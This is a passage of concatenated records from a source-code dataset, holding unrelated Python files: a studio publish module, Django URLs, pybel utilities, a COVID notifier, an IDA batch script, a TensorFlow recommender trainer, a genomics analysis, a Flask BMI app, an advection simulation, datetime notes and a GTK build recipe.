sorted/untitled.py","file_name":"untitled.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"460413920","text":"'''\nStudio Publish v0.1 \nDate: August 12, 2018\nLast modified: August 12, 2018\nAuthor: Subin. Gopi(subing85@gmail.com)\n\n# Copyright(c) 2018, Subin Gopi\n# All rights reserved.\n\n# WARNING! 
All changes made in this file will be lost!\n\nDescription\n This module contain studio publish.\n'''\n\nimport warnings\nimport os\nimport importlib\n\nfrom pprint import pprint\n\nfrom module import studioValidation\nfrom module import studioBucket\n\nimport imp\nimp.reload(studioBucket)\n\nPUBLISH_PATH = 'Z:/package_users/sid/package/publish'\nRELASE_PATH = 'Z:/shows'\n\nglobal result\n\n\nclass Publish(studioValidation.Validation):\n\n def __init__(self, step, cube):\n '''\n step = 'conceptArt'\n cube = 'Bat'\n '''\n if not step:\n warnings.warn(\n 'class Validation initializes(__init__) None', Warning)\n if not cube:\n warnings.warn(\n 'class Validation initializes(__init__) None', Warning)\n\n self.step = step\n self.cube = cube\n\n self.bucket = studioBucket.Bucket(bucket=None,\n step=self.step,\n cube=self.cube)\n self.currentBucket = self.bucket.bucket\n self.bucket.setCurrentBucket()\n self.bucket.setCurrentStep()\n self.bucket.setCurrentCube()\n self.path = os.path.abspath(os.path.join(PUBLISH_PATH,\n self.currentBucket,\n self.step)).replace('\\\\', '/')\n\n self.collect() \n\n def validatorBundles(self):\n bundles = self.getValidBundles('validator', valid=True)\n return bundles\n\n def extractorBundles(self):\n bundles = self.getValidBundles('extractor', valid=True)\n pprint(bundles)\n\n def releaseBundles(self):\n bundles = self.getValidBundles('release', valid=True)\n pprint(bundles)\n\n def excuteCommon(self, validators):\n #result = None\n for each_module, module_value in validators.items():\n bundle_name = module_value['__name__']\n from_line = 'from publish.{}.{} import {}'.format(self.currentBucket,\n self.step,\n bundle_name,\n bundle_name)\n \n\n result_line = '\\n{}.trailRun()'.format(bundle_name)\n current_module = from_line + result_line\n\n try:\n exec(from_line)\n result = eval(result_line)\n except Exception as exceptResult:\n result = 'error'\n print(exceptResult)\n print(result)\n\n from publish.asset.conceptArt import oneKMap_extractor\n import imp\n imp.reload(oneKMap_extractor)\n \n oneKMap_extractor.trailRun()\n \n def excuteValidator(self, validators):\n self.excuteCommon(validators)\n\n def excuteExtractor(self, extractors):\n self.excuteCommon(extractors)\n\n def excuteRelease(self, releases):\n self.excuteCommon(releases)\n\n def doPublish(self):\n pass\n\n def getDetails(self):\n pass\n\n\npath = 'Z:/package_users/sid/package/publish/asset/conceptArt'\nstep = 'conceptArt'\ncube = 'Bat'\nval = Publish(step, cube)\nvalidator = val.validatorBundles()\nval.excuteValidator(validator)\n","sub_path":"module/studioPublish.py","file_name":"studioPublish.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"550680871","text":"from django.conf.urls import patterns, include, url\n\nfrom amigo import views\n\nurlpatterns = patterns('',\n\turl(r'^$', 'amigo.views.index', name='listar'),\n\turl(r'^busca/$', 'amigo.views.busca', name='busca'),\n\turl(r'^solicitacoes/$', 'amigo.views.solicitacoes', name='solicitacoes'),\n\turl(r'^seguir/(?P\\d+)/$', 'amigo.views.seguir', name='seguir'),\n\turl(r'^autorizar/(?P\\d+)/$', 'amigo.views.autorizar', name='autorizar'),\n\t#url(r'^cadastrar/$', views.CadastrarPadrao.as_view(), name='cadastrar'),\n\t#url(r'^editar/(?P\\d+)/$', views.EditarPadrao.as_view(), name='editar'),\n\t#url(r'^deletar/(?P\\d+)/$', views.DeletarPadrao.as_view(), 
name='deletar'),\n)","sub_path":"amigo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"465639847","text":"# -*- coding: utf-8 -*-\n\nfrom pybel.constants import *\nfrom ..utils import build_template_environment, render_template_by_env\n\n__all__ = [\n 'render_template',\n 'default_color_map'\n]\n\nHERE = os.path.dirname(os.path.abspath(__file__))\nTEMPLATE_ENVIRONMENT = build_template_environment(HERE)\n\n\ndef render_template(template_filename, context=None):\n return render_template_by_env(TEMPLATE_ENVIRONMENT, template_filename, context=context)\n\n\n#: The color map defining the node colors in visualization\ndefault_color_map = {\n PROTEIN: \"#1F77B4\",\n PATHOLOGY: \"#FF7F0E\",\n BIOPROCESS: \"#2CA02C\",\n MIRNA: \"#D62728\",\n COMPLEX: \"#9467bd\",\n COMPOSITE: \"#9467bd\",\n REACTION: \"#8c564b\",\n GENE: \"#e377c2\",\n ABUNDANCE: \"#bcbd22\",\n RNA: \"#17becf\"\n}\n","sub_path":"src/pybel_tools/visualization/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"649254354","text":"\"\"\"\nA notification system for COVID-19 (Coronavirus) status\n\"\"\"\n\nfrom plyer import notification\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\n\n\ndef notifyMe(title, message):\n notification.notify(\n title=title,\n message=message,\n app_icon=\"icon_path/icon.ico\",\n timeout=10\n )\n\n\ndef getData(url):\n r = requests.get(url)\n return r.text\n\n\nif __name__ == '__main__':\n while True:\n # notifyMe(\"Rohit\", \"Let's stop this virus spread.!!\")\n myHtmlData = getData('https://www.mohfw.gov.in/')\n # print(myHtmlData)\n soup = BeautifulSoup(myHtmlData, 'html.parser')\n # print(soup.prettify())\n myDataStr = \"\"\n for tr in soup.find_all('tbody'):\n myDataStr += tr.get_text()\n myDataStr = myDataStr[1:]\n\n itemList = myDataStr.split('\\n\\n')\n states = ['Bihar', 'Maharashtra', 'Delhi', 'Karnataka']\n for item in itemList[0:31]:\n dataList = (item.split('\\n'))[1:]\n if dataList[1] in states:\n nTitle = 'Cases of Covid-19'\n nText = f\"State : {dataList[1]}\\nTotal Confirmed Cases : {dataList[2]}\\nCured/Discharged : {dataList[3]}\\nDeath : {dataList[4]}\"\n notifyMe(nTitle, nText)\n time.sleep(4)\n time.sleep(3600)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"519616993","text":"\nimport sys, os, getopt\nimport re\nimport subprocess\n\ndef main(argv):\n usagestring = 'batch_ida.py --ida= --script= [--diagnostic]'\n\n \n try:\n opts, args = getopt.getopt(argv,\"\",[\"ida=\",\"script=\", \"diagnostic\"])\n except getopt.GetoptError:\n print(usagestring)\n sys.exit(2)\n\n idapath = {}\n scriptpath = {}\n diagnostic = False\n\n for opt, arg in opts:\n if opt == \"--ida\":\n idapath = arg\n elif opt==\"--script\":\n scriptpath = arg\n elif opt==\"--diagnostic\":\n diagnostic = True\n\n \n if not idapath or not scriptpath:\n print(usagestring)\n sys.exit(2)\n \n backupRegularExp = re.compile(\".*_[0-9]+.idb\")\n\n for entryName in os.listdir(\".\"):\n if entryName.endswith(\".idb\"):\n if backupRegularExp.match(entryName):\n if diagnostic: print(\"Ignoring %s, detected as backup\", entryName)\n else:\n # note: We can not use subprocess.call with a list of args because somehow it messes up 
the scriptpath if it contains a space (necessary for scripts with params)\n commandToExecute='\\\"{}\\\" -A -S\\\"{} --exitida\\\" \"{}\"'.format(idapath, scriptpath, entryName)\n if not diagnostic:\n print(\"Running script for %s\" % entryName)\n try:\n subproc = subprocess.run(commandToExecute, check=True, capture_output=True)\n except subprocess.CalledProcessError as e:\n print(\"Failed to run '%s' with error:\" % commandToExecute)\n print(e.stderr)\n sys.exit(e.returncode)\n\n else:\n print(\"Would call:\\n{}\\n\".format(commandToExecute))\n print(\"Done executing batch !\")\n \n \n \nif __name__ == \"__main__\":\n main(sys.argv[1:])","sub_path":"scripts/IDA/batch_ida.py","file_name":"batch_ida.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174247448","text":"import os\r\nimport time\r\nimport pickle\r\nimport random\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport sys\r\nimport csv\r\nimport eval\r\nfrom input import DataInput\r\nfrom model import Model\r\n\r\n#os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\r\nrandom.seed(1234)\r\nnp.random.seed(1234)\r\ntf.set_random_seed(1234) \r\n\r\nlearning_rate = 0.1\r\nkeep_prob = 1\r\nlambda_reg = 0.01\r\ntrunc_len = 20\r\ntrain_batch_size = 64\r\ntest_batch_size = 64\r\nhidden_u = 10\r\nhidden_i = 10\r\n\r\n\r\nworkdir = '/cluster/home/it_stu11/qitian/KDD/data'\r\nwith open(workdir+'/Clothing_dataset_-2_new.pkl', 'rb') as f:\r\n\ttrain_set = pickle.load(f)\r\n\ttest_set = pickle.load(f)\r\n\tu_his_list = pickle.load(f)\r\n\ti_his_list = pickle.load(f)\r\n\tuser_count, item_count, example_count = pickle.load(f)\r\n \r\ndef calc_metric(score_label_u):\r\n\tscore_label_u = sorted(score_label_u, key=lambda d:d[0], reverse=True)\r\n\tprecision = eval.precision_k(score_label_u, 3)\r\n\trecall = eval.recall_k(score_label_u, 3)\r\n\ttry:\r\n\t\tf1 = 2*precision*recall/(precision+recall)\r\n\texcept:\r\n\t\tf1 = 0\r\n\tauc = eval.auc(score_label_u)\r\n\tndcg = eval.ndcg_k(score_label_u, 3)\r\n\treturn precision, recall, f1, auc, ndcg\r\n\t\t\r\ndef _eval(sess, model, test_set_list):\r\n\tloss_sum = 0.\r\n\tPrecision = 0.\r\n\tRecall = 0.\r\n\tF1 = 0.\r\n\tAUC = 0.\r\n\tNDCG = 0.\r\n\tnum = 0\r\n\tscore_label_all = []\r\n\tfor i in range(len(test_set_list)):\r\n\t\tuid = test_set_list[i][0][0]\r\n\t\tu_his_all = u_his_list[uid]\r\n\t\ttest_set_list_u = test_set_list[i]\r\n\t\tuid1_list, iid1_list, label1_list = [], [], []\r\n\t\tuid2_list, iid2_list, label2_list = [], [], []\r\n\t\tu_his, u_his_l = [], []\r\n\t\ti_his, i_his_l = [], []\r\n\t\tfor s in test_set_list_u:\r\n\t\t\tuid1_list.append(uid)\r\n\t\t\tiid1_list.append(s[1])\r\n\t\t\tlabel1_list.append(s[2])\r\n\t\t\tu_his_u, i_his_i = [], []\r\n\t\t\tfor i in u_his_all:\r\n\t\t\t\tif i==s[1]:\r\n\t\t\t\t\tbreak\r\n\t\t\t\tu_his_u.append(i)\r\n\t\t\tu_his_u = u_his_u[max(len(u_his_u)-trunc_len, 0):len(u_his_u)]\r\n\t\t\tu_his_l_u = len(u_his_u)\r\n\t\t\tif u_his_l_u<=0:\r\n\t\t\t\tu_his_u = [0]\r\n\t\t\tu_his.append(u_his_u)\r\n\t\t\tu_his_l.append(u_his_l_u)\r\n\t\t\ti_his_all = i_his_list[s[1]]\r\n\t\t\tfor u in i_his_all:\r\n\t\t\t\tif u==s[0]:\r\n\t\t\t\t\tbreak\r\n\t\t\t\ti_his_i.append(u)\r\n\t\t\ti_his_i = i_his_i[max(len(i_his_i)-trunc_len, 0):len(i_his_i)]\r\n\t\t\ti_his_l_i = len(i_his_i)\r\n\t\t\tif i_his_l_i<=0:\r\n\t\t\t\ti_his_i = [0]\r\n\t\t\ti_his.append(i_his_i)\r\n\t\t\ti_his_l.append(i_his_l_i)\r\n\t\t\tfor k in range(2):\r\n\t\t\t\tneg = 
s[1]\r\n\t\t\t\twhile neg==s[1]:\r\n\t\t\t\t\tneg = np.random.randint(0, item_count)\r\n\t\t\t\tuid1_list.append(uid)\r\n\t\t\t\tiid1_list.append(neg)\r\n\t\t\t\tlabel1_list.append(0)\r\n\t\t\t\tu_his.append(u_his_u)\r\n\t\t\t\tu_his_l.append(u_his_l_u)\r\n\t\t\t\ti_his.append(i_his_i)\r\n\t\t\t\ti_his_l.append(i_his_l_i)\r\n\t\t\tuid2_list.append(uid)\r\n\t\t\tiid2_list.append(s[1])\r\n\t\t\tlabel2_list.append(s[2])\r\n\t\t\tfor k in range(2):\r\n\t\t\t\tneg = s[0]\r\n\t\t\t\twhile neg==s[0]:\r\n\t\t\t\t\tneg = np.random.randint(0, user_count)\r\n\t\t\t\tuid2_list.append(neg)\r\n\t\t\t\tiid2_list.append(s[1])\r\n\t\t\t\tlabel2_list.append(0)\r\n\t\tu_his_maxlength = max(max(u_his_l), 1)\r\n\t\tu_hisinput = np.zeros([len(uid1_list), u_his_maxlength], dtype=np.int32)\r\n\t\tfor i, ru in enumerate(u_his):\r\n\t\t\tu_hisinput[i, :len(ru)] = ru[:len(ru)]\r\n\t\ti_his_maxlength = max(max(i_his_l), 1)\r\n\t\ti_hisinput = np.zeros([len(iid1_list), i_his_maxlength], dtype=np.int32)\r\n\t\tfor i, ru in enumerate(i_his):\r\n\t\t\ti_hisinput[i, :len(ru)] = ru[:len(ru)]\r\n\t\tdatainput1 = (uid1_list, iid1_list, label1_list)\r\n\t\tdatainput2 = (uid2_list, iid2_list, label2_list)\r\n\t\tscore, loss = model.eval(sess, datainput1, datainput2, u_hisinput, u_his_l, i_hisinput, i_his_l)\r\n\t\tscore_label_u = []\r\n\t\tfor i in range(len(score)):\r\n\t\t\tscore_label_u.append([score[i], label1_list[i]])\r\n\t\t\tscore_label_all.append([score[i], label1_list[i]])\r\n\t\tprecision, recall, f1, auc, ndcg = calc_metric(score_label_u)\r\n\t\tloss_sum += loss\r\n\t\tPrecision += precision\r\n\t\tRecall += recall\r\n\t\tF1 += f1\r\n\t\tAUC += auc\r\n\t\tNDCG += ndcg\r\n\t\tnum += 1\r\n\tscore_label_all = sorted(score_label_all, key=lambda d:d[0], reverse=True)\r\n\tGP = eval.precision_k(score_label_all, 0.3*len(score_label_all))\r\n\tGAUC = eval.auc(score_label_all)\r\n\treturn loss_sum/num, Precision/num, Recall/num, F1/num, AUC/num, NDCG/num, GP, GAUC\r\n\r\n#log_txt = open('/home/myronwu/ijcai2019/code/MetaDSR/log/'+'2018-12-24-1.txt', 'w')\r\n\r\ntest_set_df = pd.DataFrame(test_set, columns=['uid', 'iid', 'label'])\r\ntest_set_list = []\r\nfor uid, hist in test_set_df.groupby('uid'):\r\n\ttest_set_list_u = []\r\n\tfor i in range(hist.shape[0]):\r\n\t\ttest_set_list_u.append([hist.iloc[i][0], hist.iloc[i][1], hist.iloc[i][2]])\r\n\ttest_set_list.append(test_set_list_u)\r\ngpu_options = tf.GPUOptions(allow_growth=True)\r\nwith tf.Session() as sess:\r\n\tmodel = Model(user_count, item_count)\r\n\tsess.run(tf.global_variables_initializer())\r\n\tsess.run(tf.local_variables_initializer()) \r\n\t#model.restore(sess, '/home/myronwu/save_model/DUAL_GAT.ckpt')\r\n\r\n\tsys.stdout.flush()\r\n\tstart_time = time.time()\r\n\tTrain_loss_pre = 100\r\n\tbestP, bestR, bestF1, bestAUC = 0.0, 0.0, 0.0, 0.0\r\n\tfor _ in range(10000):\r\n\r\n\t\trandom.shuffle(train_set)\r\n\t\tepoch_size = round(len(train_set) / train_batch_size)\r\n\t\titer_num, loss_r_sum, loss_reg_sum = 0, 0., 0.\r\n\t\tfor _, datainput1, datainput2, u_hisinput, u_his_l, i_hisinput, i_his_l in DataInput(train_set, u_his_list, i_his_list, train_batch_size, trunc_len, user_count, item_count):\r\n\t\t\tloss_r, loss_reg = model.train(sess, datainput1, datainput2, u_hisinput, u_his_l, i_hisinput, i_his_l, learning_rate, keep_prob, lambda_reg)\r\n\t\t\titer_num += 1\r\n\t\t\tloss_r_sum += loss_r\r\n\t\t\tloss_reg_sum += loss_reg\r\n\r\n\t\t\tif model.global_step.eval() % 1000 == 0:\r\n\t\t\t\tTrain_loss_r = loss_r_sum / iter_num\r\n\t\t\t\tTrain_loss_reg = 
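# --- Illustrative aside (hypothetical stand-in for the project's private `eval`
# module, which is not shown in this file): calc_metric above sorts
# (score, label) pairs by score descending and reads off top-k metrics. A
# minimal precision@k consistent with that usage:
def precision_k(score_label, k):
    top = sorted(score_label, key=lambda d: d[0], reverse=True)[:int(k)]
    return sum(label for _, label in top) / max(len(top), 1)

print(precision_k([(0.9, 1), (0.8, 0), (0.4, 1)], 2))  # 0.5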
loss_reg_sum / iter_num\r\n\t\t\t\tTest_loss, P, R, F1, AUC, NDCG, GP, GAUC = _eval(sess, model, test_set_list)\r\n\t\t\t\tprint('Epoch %d Step %d Train: %.4f Reg: %.4f Test: %.4f P: %.4f R: %.4f F1: %.4f AUC: %.4f' %\r\n\t\t\t\t(model.global_epoch_step.eval(), model.global_step.eval(), Train_loss_r, Train_loss_reg, Test_loss, P, R, F1, AUC))\r\n\t\t\t\tprint('Best P: %.4f Best R: %.4f Best F1: %.4f Best AUC: %.4f' %\r\n\t\t\t\t(bestP, bestR, bestF1, bestAUC))\r\n\t\t\t\titer_num = 0\r\n\t\t\t\tloss_r_sum, loss_reg_sum = 0., 0.\r\n\t\t\t\tif AUC > bestAUC:\r\n\t\t\t\t\tmodel.save(sess, '/cluster/home/it_stu11/qitian/KDD/save_model/DEEMS_RNN.ckpt') \r\n\t\t\t\t\tbestAUC = AUC\r\n\t\t\t\tif P > bestP: \r\n\t\t\t\t\tbestP = P\r\n\t\t\t\tif R > bestR: \r\n\t\t\t\t\tbestR = R\r\n\t\t\t\tif F1 > bestF1: \r\n\t\t\t\t\tbestF1 = F1\r\n\t\t\t\t#log_txt.write('Epoch %d Step %d Train_r_loss: %.4f Train_loss_sn: %.4f Test_loss: %.4f MAE: %.4f MRSE: %.4f Best_mae: %.4f Best_RMSE: %.4f' %\r\n\t\t\t\t#(model.global_epoch_step.eval(), model.global_step.eval(), Train_loss_r, Train_loss_sn, Test_loss, MAE, RMSE, best_mae, best_rmse))\r\n\r\n\t\t#print('Epoch %d DONE\\tCost time: %.2f' %\r\n\t\t#(model.global_epoch_step.eval(), time.time()-start_time))\r\n\t\tsys.stdout.flush()\r\n\t\tmodel.global_epoch_step_op.eval()\r\n\t\t#if model.global_epoch_step.eval() % 10 == 9:\r\n\t\t#\tlearning_rate_sn = learning_rate_sn*0.9\r\n\r\n\t\t#if abs(Train_loss-Train_loss_pre) < 1e-6:\r\n\t\t#\tbreak\r\n\t\t#Train_loss_pre = Train_loss\r\n\t\r\n\r\n\tsys.stdout.flush()\r\n\t\r\n","sub_path":"DEEMS_RNN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196782844","text":"import numpy as np\nimport pickle\nimport pathlib\nfrom model import utils\nfrom scipy.stats import spearmanr\npath = pathlib.Path.cwd()\nif path.stem == 'DeepTMB':\n cwd = path\nelse:\n cwd = list(path.parents)[::-1][path.parts.index('DeepTMB')]\n import sys\n sys.path.append(str(cwd))\n\nt = utils.LogTransform(bias=4, min_x=0)\n\ndata = pickle.load(open(cwd / 'tables' / 'table_1' / 'DUKE-F1-DX1' / 'tumor_normal' / 'data' / 'data.pkl', 'rb'))\nancestry = pickle.load(open(cwd / 'files' / 'ethnicity.pkl', 'rb'))\n\n[data.pop(i) for i in list(data.keys()) if not data[i]]\n\nprint('without_ancestry')\nrun_predictions, test_idx, values, losses = pickle.load(open(cwd / 'tables' / 'table_2' / 'DUKE-F1-DX1' / 'tumor_normal' / 'results' / 'without_ancestry.pkl', 'rb'))\n\nnon_syn = ['Missense_Mutation', 'Nonsense_Mutation', 'Frame_Shift_Del', 'Frame_Shift_Ins', 'In_Frame_Del', 'In_Frame_Ins', 'Nonstop_Mutation']\nnon_syn_data = {i: sum([data[i][5].to_dict()[j] for j in data[i][5].index if j in non_syn]) for i in data}\ncutoff = np.percentile(list(non_syn_data.values()), 98)\nanc = np.array([ancestry.get(i[:12], 'OA') for i in data])\nanc_encoding = {'AA': 1, 'EA': 2, 'EAA': 3, 'NA': 4, 'OA': 0}\nanc = np.array([anc_encoding[i] for i in anc])\nmask = list(non_syn_data.values()) < cutoff\nanc = anc[mask]\np_TMB = np.array([sum([data[i][5].to_dict()[j] for j in data[i][5].index if j in non_syn]) / (data[i][1] / 1e6) for i in data])\np_TMB = p_TMB[mask]\nY = np.array([i[2] / (i[3] / 1e6) for i in data.values()])\nY = Y[mask]\n\n\nfor i in range(1, 5):\n print(i)\n mask = anc[np.concatenate(test_idx)] == i\n tmb_high = p_TMB[np.concatenate(test_idx)][mask] >= 5\n print(round(np.mean(np.abs(Y[np.concatenate(test_idx)][mask][tmb_high] - 
t.inv(np.concatenate(run_predictions)[mask][tmb_high]))), 2))\n print(round(spearmanr(t.inv(np.concatenate(run_predictions)[mask][tmb_high]), Y[np.concatenate(test_idx)][mask][tmb_high])[0], 2))\n\n\nprint('with ancestry')\nrun_predictions, test_idx, values, losses = pickle.load(open(cwd / 'tables' / 'table_2' / 'DUKE-F1-DX1' / 'tumor_normal' / 'results' / 'with_ancestry.pkl', 'rb'))\n\nfor i in range(1, 5):\n print(i)\n mask = anc[np.concatenate(test_idx)] == i\n tmb_high = p_TMB[np.concatenate(test_idx)][mask] >= 5\n print(round(np.mean(np.abs(Y[np.concatenate(test_idx)][mask][tmb_high] - t.inv(np.concatenate(run_predictions)[mask][tmb_high]))), 2))\n print(round(spearmanr(t.inv(np.concatenate(run_predictions)[mask][tmb_high]), Y[np.concatenate(test_idx)][mask][tmb_high])[0], 2))\n\n\n","sub_path":"tables/table_2/DUKE-F1-DX1/tumor_normal/analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"528242743","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n\n@app.route('/bmi/<weight>/<height>/')\ndef index(weight, height):\n weight = int(weight)\n height = float(height)\n BMI = weight / (height**2)\n answer = 'HeHe'\n if BMI < 16 :\n answer = \"Severely Underweight\"\n elif BMI < 18.5 :\n answer = \"Underweight\"\n elif BMI < 25 :\n answer = \"Normal\"\n elif BMI < 30 :\n answer = \"Overweight\"\n else :\n answer = \"Obese\"\n return str(BMI) + \" \" +answer\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"Session01/Homework/Bai2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206856296","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\n###Packages###\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.linalg\nimport scipy.special\n\nfrom mpl_toolkits.mplot3d import axes3d\nfrom matplotlib.collections import PolyCollection\nfrom matplotlib.colors import colorConverter\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.collections import LineCollection\nimport numpy as np # External library for numerical calculations\nimport matplotlib.pyplot as plt # Plotting library\nfrom matplotlib import animation\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nplt.style.use('classic')\nimport time\n \n\n\nclass VectorCreate():\n def __init__(self, name, array):\n self.name = name\n self.array = array\n \n def adding_ammount(self, amount):\n self.array += amount\n \n def ic(self):\n self.array = np.exp(- 100*(self.array-1/4)**2 )\n \n def print_array(self):\n print(self.array)\n \n def plot_array(self):\n plt.plot(self.array)\n plt.show()\n \n def plot_array_clear(self):\n plt.ylim(-0.1, 1)\n plt.plot(self.array)\n plt.draw()\n plt.pause(0.001)\n plt.clf()\n \n def FE(self):\n nx = len(self.array)\n for j in range(0,nx): \n self.array[j] = self.array[j] - 0.5*(self.array[j] - self.array[(j-1)%nx])\n \n def FE_eff(self):\n nx = len(self.array)\n self.array = self.array - 0.5*(self.array - np.roll(self.array,1)) \n \n \n \n \n \n \n \n \n##########********. 
2D *********############ \n\n\n\n\n\n\n \ndef upstream_flux(m,p,c):\n    return 0.5*( p*(c-abs(c)) + m*(c+abs(c)) )\n\nclass Psi2dCreate():\n    def __init__(self, name, array, X, Y):\n        self.name = name\n        self.array = array\n        self.X = X\n        self.Y = Y\n    \n    def ic2d(self):\n        self.array = np.exp(- ( (self.X-1/4)**2+(self.Y-1/4)**2 ) /0.01)\n    \n    \n    def FE_2D(self,Upxfield,Upyfield):\n        \n        nx = len(Upxfield)\n        ny = len(Upxfield)\n\n        upx = np.zeros([ny,nx])\n        upy = np.zeros([ny,nx])\n        for j in range(0,ny):\n            for i in range(0,nx):\n                upy[j,i] = upstream_flux(self.array[(j),i],self.array[(j+1)%ny,i],Upyfield[j,i])\n                upx[j,i] = upstream_flux(self.array[j,(i)],self.array[j,(i+1)%nx],Upxfield[j,i])\n                \n                self.array[j,i] = self.array[j,i] - 1*(upy[(j),i] - upy[(j-1)%ny,i] ) - 1*( upx[j,(i)] - upx[j,(i-1)%nx] )\n    \n    def plot_array_clear(self):\n        plt.ylim(-0.1, 1)\n        plt.plot(self.array)\n        plt.draw()\n        plt.pause(0.001)\n        plt.clf()\n    \n    \nclass MatrixClass():\n    def __init__(self,name,M):\n        self.name = name\n        self.M= M\n    \n    \nclass Matrix_storage_Bank():\n    def __init__(self,name,psvelx,psvely,fx,fy,psiprime,psiprimeprime,beta,Upxfield,Upyfield,upx,upy):\n        self.name = name\n        self.psvelx = psvelx\n        self.psvely = psvely\n        self.fx = fx \n        self.fy = fy\n        self.psiprime = psiprime\n        self.psiprimeprime = psiprimeprime\n        self.beta = beta\n        self.Upxfield = Upxfield\n        self.Upyfield = Upyfield\n        self.upx = upx\n        self.upy = upy\n    \ndef __main__():\n    xmin = 0; xmax = 1; tmin =0; tmax = 10; nx = 101; nt = 101;\n    x = np.linspace(xmin,xmax,nx)\n    p = np.linspace(xmin,xmax,nx)\n    pp = VectorCreate(\"pp\", p)\n    pp.ic()\n    xx = VectorCreate(\"xx\", x)\n    xx.adding_ammount(pp.array) ## this adds one as the function above has done\n    \n    fig , ax = plt.subplots()\n    \n    for t in range(0,nt):\n        start = time.time()\n        pp.FE_eff() \n        end = time.time()\n        print(end - start) \n        #pp.plot_array_clear()\n    plt.clf()\n    \ndef __main2d__():\n    \n    xmin = -1;xmax =1; ymin =-1;ymax =1;\n    dx = 0.1; dy =0.1; a =1; dt = 0.05; tmax = 10;\n\n    x = np.arange(xmin,xmax,dx)\n    y = np.arange(ymin,ymax,dy)\n    nx = round((xmax - xmin )/dx)\n    ny = round((ymax - ymin )/dy)\n    c_1 = dt/dx*a\n    c_2 = dt/dx*a\n    print(c_1+c_2,'=c_1+c_2')\n    \n    X, Y = np.meshgrid(x, y)\n    psistructure = np.zeros([ny,nx])\n    psi = Psi2dCreate(\"psi\",psistructure,X,Y)\n    psi.ic2d()\n    \n    \n    fig = plt.figure(1)\n    ax = fig.gca(projection='3d')\n    surf = ax.plot_wireframe(X,Y,psi.array,cmap=cm.coolwarm)\n    ax.set_zlabel('Z')\n    ax.set_zlim(-0.1, 0.5)\n    U = MatrixClass(\"U\",Y)\n    V = MatrixClass(\"U\",-X)\n    Upxfield = np.zeros([ny,nx])\n    Upyfield = np.zeros([ny,nx])\n    for j in range(0,ny):\n        for i in range(0,nx):\n            ##this is the first pass\n            Upxfield[j,i] = c_1*0.5*(U.M[j,(i+1)%nx]+U.M[j,i])\n            Upyfield[j,i] = c_2*0.5*(V.M[(j+1)%ny,i]+V.M[j,i] )\n    fig, ax = plt.subplots()\n    q = ax.quiver(x, y, U.M, V.M)\n    plt.show() \n    \n    t=0;tmax=1;\n    while(t\n\nt.days\n# 4\n\nt.seconds\n# 36000\n\nt.hours\n# Traceback (most recent call last):\n#   File \"<stdin>\", line 1, in <module>\n# AttributeError: 'datetime.timedelta' object has no attribute 'hours'\n\nt.seconds / 60 / 60\n# 10.0\n\nt.seconds / 3600\n# 10.0\n\n# # # # # # # # # # # # # #\n\neta = timedelta(hours=6)\n\ntoday = datetime.today()\n\ntoday\n# datetime.datetime(2019, 1, 1, 18, 37, 59, 638263)\n\neta\n# datetime.timedelta(0, 21600)\n\ntoday + eta\n# datetime.datetime(2019, 1, 2, 0, 37, 59, 638263)\n\nstr(today + eta)\n# '2019-01-02 
00:37:59.638263'\n\n\n\n","sub_path":"days/01-03-datetimes/datetime_timedelta.py","file_name":"datetime_timedelta.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"213784039","text":"class GtkPackage (GnomeXzPackage):\n\tdef __init__ (self):\n\t\tGnomeXzPackage.__init__ (self, 'gtk+', version_major = '3.16', version_minor = '3',\n\t\t\tconfigure_flags = [\n\t\t\t\t'--with-gdktarget=quartz',\n\t\t\t\t'--enable-quartz-backend',\n\t\t\t\t'--enable-debug',\n\t\t\t\t'--enable-static',\n\t\t\t\t'--disable-glibtest',\n\t\t\t\t'--disable-introspection',\n\t\t\t\t'--disable-cloudprint',\n\t\t\t\t'--disable-wayland-backend',\n\t\t\t\t'--disable-schemas-compile',\n\t\t\t\t'--disable-installed-tests',\n\t\t\t\t'gio_can_sniff=yes'\n\t\t\t]\n\t\t)\n\t\tself.gdk_target = 'quartz'\n \n\t\tif Package.profile.name == 'darwin':\n\t\t\tself.gdk_target = 'quartz'\n\t\t\tself.sources.extend ([\n\t\t\t\t# Custom gtkrc\n\t\t\t\t'patches/gtkrc'\n\t\t\t])\n \n\t\tif Package.profile.name == 'darwin' and not Package.profile.m64:\n\t\t\tself.configure_flags.extend ([\n\t\t\t\t# fix build on lion, it uses 64-bit host even with -m32\n\t\t\t\t'--build=i386-apple-darwin11.2.0',\n\t\t\t])\n \n \n\tdef prep (self):\n\t\tPackage.prep (self)\n\t\tif 